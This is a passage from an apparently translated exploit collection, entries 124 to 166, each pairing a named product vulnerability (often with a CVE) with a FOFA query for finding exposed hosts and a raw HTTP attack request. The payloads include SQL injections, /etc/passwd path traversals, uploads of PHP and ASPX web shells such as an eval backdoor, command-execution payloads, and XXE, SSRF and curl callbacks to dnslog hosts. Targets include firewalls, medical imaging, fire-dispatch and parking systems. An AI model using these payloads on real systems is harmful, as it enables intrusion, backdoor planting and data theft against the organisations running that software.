Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component id
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the cached file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 medical image archiving and communication system (PACS) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
